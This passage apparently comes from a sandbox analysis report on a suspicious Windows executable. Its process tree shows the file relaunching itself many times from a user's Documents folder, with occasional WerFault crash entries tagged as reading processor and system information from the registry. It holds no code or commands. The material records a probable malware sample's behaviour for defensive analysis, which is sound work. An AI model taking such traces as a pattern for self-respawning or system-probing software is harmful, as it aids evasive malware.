C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 284⤵
- Program crash
- Checks processor information in registry
-
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9768 -s 324⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15636 -s 284⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
C:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exeC:\Users\Admin\Documents\s5TzTzCDRxUS_LNHDU2dAW1p.exe3⤵
-
-
